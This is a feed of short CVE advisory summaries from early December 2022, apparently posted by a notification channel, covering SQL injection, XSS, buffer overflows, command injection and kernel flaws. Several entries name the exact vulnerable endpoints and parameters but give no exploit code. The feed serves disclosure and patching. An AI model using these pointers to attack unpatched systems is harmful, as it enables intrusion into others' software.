🚨 CVE-2022-3725Crash in the OPUS protocol dissector in Wireshark 3.6.0 to 3.6.8 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2022-12-03 22:47:28 |
🚨 CVE-2021-37533Prior to Apache Commons Net 3.9.0, Net's FTP client trusts the host from PASV response by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. This may lead to leakage of information about services running on the private network of the client. The default in version 3.9.0 is now false to ignore such hosts, as cURL does. See https://issues.apache.org/jira/browse/NET-711.🎖@cveNotify |
|
| 2022-12-03 19:47:29 |
🚨 CVE-2022-4277A vulnerability was found in Shaoxing Background Management System. It has been declared as critical. This vulnerability affects unknown code of the file /Default/Bd. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-214774 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-03 19:47:28 |
🚨 CVE-2022-4278A vulnerability was found in SourceCodester Book Store Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /hrm/employeeadd.php. The manipulation of the argument empid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214775.🎖@cveNotify |
|
| 2022-12-03 19:47:26 |
🚨 CVE-2022-4279A vulnerability classified as problematic has been found in SourceCodester Human Resource Management System 1.0. Affected is an unknown function of the file /hrm/employeeview.php. The manipulation of the argument search leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214776.🎖@cveNotify |
|
| 2022-12-03 19:47:25 |
🚨 CVE-2022-4280A vulnerability, which was classified as problematic, has been found in Dot Tech Smart Campus System. Affected by this issue is some unknown functionality of the file /services/Card/findUser. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-214778 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-03 18:47:43 |
🚨 CVE-2019-3919The Alcatel Lucent I-240W-Q GPON ONT using firmware version 3FE54567BOZJ19 is vulnerable to command injection via crafted HTTP request sent by a remote, authenticated attacker to /GponForm/usb_restore_Form?script/.🎖@cveNotify |
|
| 2022-12-03 18:47:42 |
🚨 CVE-2019-4039IBM WebSphere MQ 8.0.0.0 through 8.0.0.9 and 9.0.0.0 through 9.1.1 could allow a local attacker to cause a denial of service within the error log reporting system. IBM X-Force ID: 156163.🎖@cveNotify |
|
| 2022-12-03 18:47:41 |
🚨 CVE-2019-4032IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.1.0 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-ForceID: 155998.🎖@cveNotify |
|
| 2022-12-03 18:47:37 |
🚨 CVE-2019-3920The Alcatel Lucent I-240W-Q GPON ONT using firmware version 3FE54567BOZJ19 is vulnerable to authenticated command injection via crafted HTTP request sent by a remote, authenticated attacker to /GponForm/device_Form?script/.🎖@cveNotify |
|
| 2022-12-03 18:47:36 |
🚨 CVE-2019-4033IBM Content Navigator 2.0.3 and 3.0CD is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 155999.🎖@cveNotify |
|
| 2022-12-03 18:47:35 |
🚨 CVE-2019-4016IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 is vulnerable to a buffer overflow, which could allow an authenticated local attacker to execute arbitrary code on the system as root. IBM X-ForceID: 155894.🎖@cveNotify |
|
| 2022-12-03 18:47:31 |
🚨 CVE-2019-4014IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 is vulnerable to a buffer overflow, which could allow an authenticated local attacker to execute arbitrary code on the system as root. IBM X-Force ID: 155892.🎖@cveNotify |
|
| 2022-12-03 18:47:30 |
🚨 CVE-2019-4011IBM BigFix Platform 9.2 and 9.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 155885.🎖@cveNotify |
|
| 2022-12-03 18:47:29 |
🚨 CVE-2021-26730A stack-based buffer overflow vulnerability in a subfunction of the Login_handler_func function of spx_restservice allows an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.🎖@cveNotify |
|
| 2022-12-03 18:47:25 |
🚨 CVE-2021-26729Command injection and multiple stack-based buffer overflows vulnerabilities in the Login_handler_func function of spx_restservice allow an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.🎖@cveNotify |
|
| 2022-12-03 18:47:24 |
🚨 CVE-2022-41316HashiCorp Vault and Vault Enterprise’s TLS certificate auth method did not initially load the optionally configured CRL issued by the role's CA into memory on startup, resulting in the revocation list not being checked if the CRL has not yet been retrieved. Fixed in 1.12.0, 1.11.4, 1.10.7, and 1.9.10.🎖@cveNotify |
|
| 2022-12-03 18:47:23 |
🚨 CVE-2020-16602Razer Chroma SDK Rest Server through 3.12.17 allows remote attackers to execute arbitrary programs because there is a race condition in which a file created under "%PROGRAMDATA%\Razer Chroma\SDK\Apps" can be replaced before it is executed by the server. The attacker must have access to port 54236 for a registration step.🎖@cveNotify |
|
| 2022-12-03 16:47:43 |
🚨 CVE-2019-3906Premisys Identicard version 3.1.190 contains hardcoded credentials in the WCF service on port 9003. An authenticated remote attacker can use these credentials to access the badge system database and modify its contents.🎖@cveNotify |
|
| 2022-12-03 16:47:42 |
🚨 CVE-2019-4043IBM Sterling B2B Integrator Standard Edition 5.2.0 snf 6.0.0.0 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 156239.🎖@cveNotify |
|
| 2022-12-03 16:47:41 |
🚨 CVE-2019-4008API Connect V2018.1 through 2018.4.1.1 is impacted by access token leak. Authorization tokens in some URLs can result in the tokens being written to log files. IBM X-Force ID: 155626.🎖@cveNotify |
|
| 2022-12-03 16:47:37 |
🚨 CVE-2020-15901In Nagios XI before 5.7.3, ajaxhelper.php allows remote authenticated attackers to execute arbitrary commands via cmdsubsys.🎖@cveNotify |
|
| 2022-12-03 16:47:36 |
🚨 CVE-2020-15852An issue was discovered in the Linux kernel 5.5 through 5.7.9, as used in Xen through 4.13.x for x86 PV guests. An attacker may be granted the I/O port permissions of an unrelated task. This occurs because tss_invalidate_io_bitmap mishandling causes a loss of synchronization between the I/O bitmaps of TSS and Xen, aka CID-cadfad870154.🎖@cveNotify |
|
| 2022-12-03 16:47:35 |
🚨 CVE-2019-4224IBM PureApplication System 2.2.3.0 through 2.2.5.3 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 159240.🎖@cveNotify |
|
| 2022-12-03 16:47:31 |
🚨 CVE-2019-4158IBM Security Access Manager 9.0.1 through 9.0.6 does not prove that a user's identity is correct which can lead to the exposure of resources or functionality to unintended actors. IBM X-Force ID: 158574.🎖@cveNotify |
|
| 2022-12-03 16:47:30 |
🚨 CVE-2022-44347Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=inquiries/view_inquiry&id=.🎖@cveNotify |
|
| 2022-12-03 16:47:29 |
🚨 CVE-2022-44348Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/orders/update_status.php?id=.🎖@cveNotify |
|
| 2022-12-03 16:47:26 |
🚨 CVE-2022-24823Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user.🎖@cveNotify |
|
| 2022-12-03 16:47:25 |
🚨 CVE-2019-19221In Libarchive 3.4.0, archive_wstring_append_from_mbs in archive_string.c has an out-of-bounds read because of an incorrect mbrtowc or mbtowc call. For example, bsdtar crashes via a crafted archive.🎖@cveNotify |
|
| 2022-12-03 16:47:24 |
🚨 CVE-2018-3856An exploitable vulnerability exists in the smart cameras RTSP configuration of the Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17. The device incorrectly handles spaces in the URL field, leading to an arbitrary operating system command injection. An attacker can send a series of HTTP requests to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-03 12:48:05 |
🚨 CVE-2022-4272A vulnerability, which was classified as critical, has been found in FeMiner wms. Affected by this issue is some unknown functionality of the file /product/savenewproduct.php?flag=1. The manipulation of the argument upfile leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214760.🎖@cveNotify |
|
| 2022-12-03 12:48:04 |
🚨 CVE-2022-4273A vulnerability, which was classified as critical, has been found in SourceCodester Human Resource Management System 1.0. This issue affects some unknown processing of the file /hrm/controller/employee.php of the component Content-Type Handler. The manipulation of the argument pfimg leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-214769 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-03 07:50:38 |
🚨 CVE-2021-37823OpenCart 3.0.3.7 allows users to obtain database information or read server files through SQL injection in the background.🎖@cveNotify |
|
| 2022-12-03 07:50:37 |
🚨 CVE-2022-25892The package muhammara before 2.6.1, from 3.0.0 and before 3.1.1; all versions of package hummus are vulnerable to Denial of Service (DoS) when supplied with a maliciously crafted PDF file to be parsed.🎖@cveNotify |
|
| 2022-12-03 07:50:35 |
🚨 CVE-2022-3303A race condition flaw was found in the Linux kernel sound subsystem due to improper locking. It could lead to a NULL pointer dereference while handling the SNDCTL_DSP_SYNC ioctl. A privileged local user (root or member of the audio group) could use this flaw to crash the system, resulting in a denial of service condition🎖@cveNotify |
|
| 2022-12-03 07:50:34 |
🚨 CVE-2022-0171A flaw was found in the Linux kernel. The existing KVM SEV API has a vulnerability that allows a non-root (host) user-level application to crash the host kernel by creating a confidential guest VM instance in AMD CPU that supports Secure Encrypted Virtualization (SEV).🎖@cveNotify |
|
| 2022-12-03 07:50:33 |
🚨 CVE-2022-3649A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_new_inode of the file fs/nilfs2/inode.c of the component BPF. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211992.🎖@cveNotify |
|
| 2022-12-03 07:50:30 |
🚨 CVE-2022-1679A use-after-free flaw was found in the Linux kernel’s Atheros wireless adapter driver in the way a user forces the ath9k_htc_wait_for_target function to fail with some input messages. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2022-12-03 07:50:28 |
🚨 CVE-2021-42387Heap out-of-bounds read in Clickhouse's LZ4 compression codec when parsing a malicious query. As part of the LZ4::decompressImpl() loop, a 16-bit unsigned user-supplied value ('offset') is read from the compressed data. The offset is later used in the length of a copy operation, without checking the upper bounds of the source of the copy operation.🎖@cveNotify |
|
| 2022-12-03 07:50:20 |
🚨 CVE-2022-21797The package joblib from 0 and before 1.2.0 are vulnerable to Arbitrary Code Execution via the pre_dispatch flag in Parallel() class due to the eval() statement.🎖@cveNotify |
|
| 2022-12-03 07:50:19 |
🚨 CVE-2022-20421In binder_inc_ref_for_node of binder.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239630375References: Upstream kernel🎖@cveNotify |
|
| 2022-12-03 07:50:18 |
🚨 CVE-2022-20422In emulation_proc_handler of armv8_deprecated.c, there is a possible way to corrupt memory due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-237540956References: Upstream kernel🎖@cveNotify |
|
| 2022-12-03 07:50:17 |
🚨 CVE-2022-3633A vulnerability classified as problematic has been found in Linux Kernel. Affected is the function j1939_session_destroy of the file net/can/j1939/transport.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211932.🎖@cveNotify |
|
| 2022-12-03 07:50:15 |
🚨 CVE-2022-2840The Zephyr Project Manager WordPress plugin before 3.2.5 does not sanitise and escape various parameters before using them in SQL statements via various AJAX actions available to both unauthenticated and authenticated users, leading to SQL injections🎖@cveNotify |
|
| 2022-12-03 07:50:13 |
🚨 CVE-2022-43750drivers/usb/mon/mon_bin.c in usbmon in the Linux kernel before 5.19.15 and 6.x before 6.0.1 allows a user-space client to corrupt the monitor's internal memory.🎖@cveNotify |
|
| 2022-12-03 07:50:12 |
🚨 CVE-2022-3370Use after free in Custom Elements in Google Chrome prior to 106.0.5249.91 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-12-03 07:50:08 |
🚨 CVE-2022-3373Out of bounds write in V8 in Google Chrome prior to 106.0.5249.91 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-12-03 07:50:06 |
🚨 CVE-2022-39222Dex is an identity service that uses OpenID Connect to drive authentication for other apps. Dex instances with public clients (and by extension, clients accepting tokens issued by those Dex instances) are affected by this vulnerability if they are running a version prior to 2.35.0. An attacker can exploit this vulnerability by making a victim navigate to a malicious website and guiding them through the OIDC flow, stealing the OAuth authorization code in the process. The authorization code then can be exchanged by the attacker for a token, gaining access to applications accepting that token. Version 2.35.0 has introduced a fix for this issue. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2022-12-03 07:50:05 |
🚨 CVE-2022-29248Guzzle is a PHP HTTP client. Guzzle prior to versions 6.5.6 and 7.4.3 contains a vulnerability with the cookie middleware. The vulnerability is that it is not checked if the cookie domain equals the domain of the server which sets the cookie via the Set-Cookie header, allowing a malicious server to set cookies for unrelated domains. The cookie middleware is disabled by default, so most library consumers will not be affected by this issue. Only those who manually add the cookie middleware to the handler stack or construct the client with ['cookies' => true] are affected. Moreover, those who do not use the same Guzzle client to call multiple domains and have disabled redirect forwarding are not affected by this vulnerability. Guzzle versions 6.5.6 and 7.4.3 contain a patch for this issue. As a workaround, turn off the cookie middleware.🎖@cveNotify |
|
| 2022-12-03 07:50:04 |
🚨 CVE-2022-31091Guzzle, an extensible PHP HTTP client. `Authorization` and `Cookie` headers on requests are sensitive information. In affected versions on making a request which responds with a redirect to a URI with a different port, if we choose to follow it, we should remove the `Authorization` and `Cookie` headers from the request, before containing. Previously, we would only consider a change in host or scheme. Affected Guzzle 7 users should upgrade to Guzzle 7.4.5 as soon as possible. Affected users using any earlier series of Guzzle should upgrade to Guzzle 6.5.8 or 7.4.5. Note that a partial fix was implemented in Guzzle 7.4.2, where a change in host would trigger removal of the curl-added Authorization header, however this earlier fix did not cover change in scheme or change in port. An alternative approach would be to use your own redirect middleware, rather than ours, if you are unable to upgrade. If you do not require or expect redirects to be followed, one should simply disable redirects all together.🎖@cveNotify |
|
| 2022-12-03 00:47:47 |
🚨 CVE-2022-45059An issue was discovered in Varnish Cache 7.x before 7.1.2 and 7.2.x before 7.2.1. A request smuggling attack can be performed on Varnish Cache servers by requesting that certain headers are made hop-by-hop, preventing the Varnish Cache servers from forwarding critical headers to the backend.🎖@cveNotify |
|
| 2022-12-03 00:47:46 |
🚨 CVE-2022-45060An HTTP Request Forgery issue was discovered in Varnish Cache 5.x and 6.x before 6.0.11, 7.x before 7.1.2, and 7.2.x before 7.2.1. An attacker may introduce characters through HTTP/2 pseudo-headers that are invalid in the context of an HTTP/1 request line, causing the Varnish server to produce invalid HTTP/1 requests to the backend. This could, in turn, be used to exploit vulnerabilities in a server behind the Varnish server. Note: the 6.0.x LTS series (before 6.0.11) is affected.🎖@cveNotify |
|
| 2022-12-03 00:47:45 |
🚨 CVE-2022-3821An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.🎖@cveNotify |
|
| 2022-12-03 00:47:44 |
🚨 CVE-2022-42801A logic issue was addressed with improved checks. This issue is fixed in tvOS 16.1, iOS 15.7.1 and iPadOS 15.7.1, macOS Ventura 13, watchOS 9.1, iOS 16.1 and iPadOS 16, macOS Monterey 12.6.1. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2022-12-03 00:47:43 |
🚨 CVE-2022-45063xterm before 375 allows code execution via font ops, e.g., because an OSC 50 response may have Ctrl-g and therefore lead to command execution within the vi line-editing mode of Zsh. NOTE: font ops are not allowed in the xterm default configurations of some Linux distributions.🎖@cveNotify |
|
| 2022-12-03 00:47:41 |
🚨 CVE-2021-25745A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the spec.rules[].http.paths[].path field of an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.🎖@cveNotify |
|
| 2022-12-03 00:47:40 |
🚨 CVE-2021-24957The Advanced Page Visit Counter WordPress plugin before 6.1.6 does not escape the artID parameter before using it in a SQL statement in the apvc_reset_count_art AJAX action, available to any authenticated user, leading to a SQL injection🎖@cveNotify |
|
| 2022-12-03 00:47:39 |
🚨 CVE-2022-29548A reflected XSS issue exists in the Management Console of several WSO2 products. This affects API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0.🎖@cveNotify |
|
| 2022-12-03 00:47:38 |
🚨 CVE-2021-44519In Citrix XenMobile Server through 10.12 RP9, there is an Authenticated Directory Traversal vulnerability, leading to remote code execution.🎖@cveNotify |
|
| 2022-12-03 00:47:36 |
🚨 CVE-2022-29281Notable before 1.9.0-beta.8 doesn't effectively prevent the opening of executable files when clicking on a link. There is improper validation of the file URI scheme. A hyperlink to an SMB share could lead to execution of an arbitrary program (or theft of NTLM credentials via an SMB relay attack, because the application resolves UNC paths).🎖@cveNotify |
|
| 2022-12-03 00:47:35 |
🚨 CVE-2022-26151Citrix XenMobile Server 10.12 through RP11, 10.13 through RP7, and 10.14 through RP4 allows Command Injection.🎖@cveNotify |
|
| 2022-12-03 00:47:34 |
🚨 CVE-2019-4433IBM InfoSphere Global Name Management 5.0 and 6.0 and IBM InfoSphere Identity Insight 8.1 and 9.0 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 162890.🎖@cveNotify |
|
| 2022-12-03 00:47:33 |
🚨 CVE-2019-5444Path traversal vulnerability in version up to v1.1.3 in serve-here.js npm module allows attackers to list any file in arbitrary folder.🎖@cveNotify |
|
| 2022-12-03 00:47:32 |
🚨 CVE-2019-4425IBM Business Automation Workflow 18.0.0.0, 18.0.0.1, and 18.0.0.2 could allow a user to obtain highly sensitive information from another user by inserting links that would be clicked on by unsuspecting users. IBM X-Force ID: 162771.🎖@cveNotify |
|
| 2022-12-03 00:47:31 |
🚨 CVE-2019-4460IBM API Connect 5.0.0.0 through 5.0.8.6 developer portal could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 163681.🎖@cveNotify |
|
| 2022-12-03 00:47:27 |
🚨 CVE-2019-4481IBM Contract Management 10.1.0 through 10.1.3 and IBM Emptoris Spend Analysis 10.1.0 through 10.1.3 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 164064.🎖@cveNotify |
|
| 2022-12-03 00:47:26 |
🚨 CVE-2019-4357When using IBM Spectrum Protect Plus 10.1.0, 10.1.2, and 10.1.3 to protect Oracle, DB2 or MongoDB databases, a redirected restore operation specifying a target path may allow execution of arbitrary code on the system. IBM X-Force ID: 161667,🎖@cveNotify |
|
| 2022-12-03 00:47:25 |
🚨 CVE-2019-4403IBM Connections 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 162264.🎖@cveNotify |
|
| 2022-12-03 00:47:24 |
🚨 CVE-2019-5457Cross-site scripting (XSS) vulnerability in min-http-server (all versions) allows an attacker with access to the server file system to execute arbitrary JavaScript code in victim's browser.🎖@cveNotify |
|
| 2022-12-02 21:47:46 |
🚨 CVE-2022-44944Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.🎖@cveNotify |
|
| 2022-12-02 21:47:45 |
🚨 CVE-2022-44946Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.🎖@cveNotify |
|
| 2022-12-02 21:47:44 |
🚨 CVE-2022-44948Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add".🎖@cveNotify |
|
| 2022-12-02 21:47:40 |
🚨 CVE-2022-44950Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.🎖@cveNotify |
|
| 2022-12-02 21:47:39 |
🚨 CVE-2022-44952Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add".🎖@cveNotify |
|
| 2022-12-02 21:47:38 |
🚨 CVE-2022-44953webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /linkedcontent/listfiles.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add".🎖@cveNotify |
|
| 2022-12-02 21:47:35 |
🚨 CVE-2022-44954webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /contacts/listcontacts.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Last Name field after clicking "Add".🎖@cveNotify |
|
| 2022-12-02 21:47:34 |
🚨 CVE-2022-44956webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /projects/listprojects.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.🎖@cveNotify |
|
| 2022-12-02 21:47:33 |
🚨 CVE-2022-44959webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /meetings/listmeetings.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.🎖@cveNotify |
|
| 2022-12-02 21:47:29 |
🚨 CVE-2022-44961webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /forums/editforum.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.🎖@cveNotify |
|
| 2022-12-02 21:47:28 |
🚨 CVE-2022-44962webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /calendar/viewcalendar.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Subject field.🎖@cveNotify |
|
| 2022-12-02 21:47:27 |
🚨 CVE-2020-36389In CiviCRM before 5.28.1 and CiviCRM ESR before 5.27.5 ESR, the CKEditor configuration form allows CSRF.🎖@cveNotify |
|
| 2022-12-02 19:47:49 |
🚨 CVE-2022-45651Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the formSetVirtualSer function.🎖@cveNotify |
|
| 2022-12-02 19:47:48 |
🚨 CVE-2022-45655Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the timeZone parameter in the form_fast_setting_wifi_set function.🎖@cveNotify |
|
| 2022-12-02 19:47:47 |
🚨 CVE-2022-45656Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the time parameter in the fromSetSysTime function.🎖@cveNotify |
|
| 2022-12-02 19:47:46 |
🚨 CVE-2022-45657Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the fromSetIpMacBind function.🎖@cveNotify |
|
| 2022-12-02 19:47:45 |
🚨 CVE-2022-45658Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the schedEndTime parameter in the setSchedWifi function.🎖@cveNotify |
|
| 2022-12-02 19:47:44 |
🚨 CVE-2022-45659Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the wpapsk_crypto parameter in the fromSetWirelessRepeat function.🎖@cveNotify |
|
| 2022-12-02 19:47:42 |
🚨 CVE-2022-45660Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the schedStartTime parameter in the setSchedWifi function.🎖@cveNotify |
|
| 2022-12-02 19:47:41 |
🚨 CVE-2022-45661Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the time parameter in the setSmartPowerManagement function.🎖@cveNotify |
|
| 2022-12-02 19:47:40 |
🚨 CVE-2022-45664Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the list parameter in the formwrlSSIDget function.🎖@cveNotify |
|
| 2022-12-02 19:47:35 |
🚨 CVE-2022-45667Tenda i22 V1.0.0.3(4687) is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolRestoreSet.🎖@cveNotify |
|
| 2022-12-02 19:47:34 |
🚨 CVE-2022-45668Tenda i22 V1.0.0.3(4687) is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot.🎖@cveNotify |
|
| 2022-12-02 19:47:33 |
🚨 CVE-2022-45669Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the index parameter in the formWifiMacFilterGet function.🎖@cveNotify |
|
| 2022-12-02 19:47:32 |
🚨 CVE-2022-45641Tenda AC6V1.0 V15.03.05.19 is vulnerable to Buffer Overflow via formSetMacFilterCfg.🎖@cveNotify |
|
| 2022-12-02 19:47:27 |
🚨 CVE-2022-45644Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceId parameter in the formSetClientState function.🎖@cveNotify |
|
| 2022-12-02 19:47:26 |
🚨 CVE-2022-45645Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceMac parameter in the addWifiMacFilter function.🎖@cveNotify |
|
| 2022-12-02 19:47:25 |
🚨 CVE-2022-45647Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the limitSpeed parameter in the formSetClientState function.🎖@cveNotify |
|
| 2022-12-02 19:47:24 |
🚨 CVE-2022-45648Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the devName parameter in the formSetDeviceName function.🎖@cveNotify |
|
| 2022-12-02 18:47:30 |
🚨 CVE-2022-4202A vulnerability, which was classified as problematic, was found in GPAC 2.1-DEV-rev490-g68064e101-master. Affected is the function lsr_translate_coords of the file laser/lsr_dec.c. The manipulation leads to integer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-214518 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-02 18:47:29 |
🚨 CVE-2021-25463Improper access control vulnerability in PENUP prior to version 3.8.00.18 allows arbitrary webpage loading in webview.🎖@cveNotify |
|
| 2022-12-02 15:47:30 |
🚨 CVE-2022-41412An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks.🎖@cveNotify |
|
| 2022-12-02 15:47:29 |
🚨 CVE-2022-46366** UNSUPPORTED WHEN ASSIGNED ** Apache Tapestry 3.x allows deserialization of untrusted data, leading to remote code execution. This issue is similar to but distinct from CVE-2020-17531, which applies the the (also unsupported) 4.x version line. NOTE: This vulnerability only affects Apache Tapestry version line 3.x, which is no longer supported by the maintainer. Users are recommended to upgrade to a supported version line of Apache Tapestry.🎖@cveNotify |
|
| 2022-12-02 15:47:25 |
🚨 CVE-2022-3859An uncontrolled search path vulnerability exists in Trellix Agent (TA) for Windows in versions prior to 5.7.8. This allows an attacker with admin access, which is required to place the DLL in the restricted Windows System folder, to elevate their privileges to System by placing a malicious DLL there.🎖@cveNotify |
|
| 2022-12-02 15:47:24 |
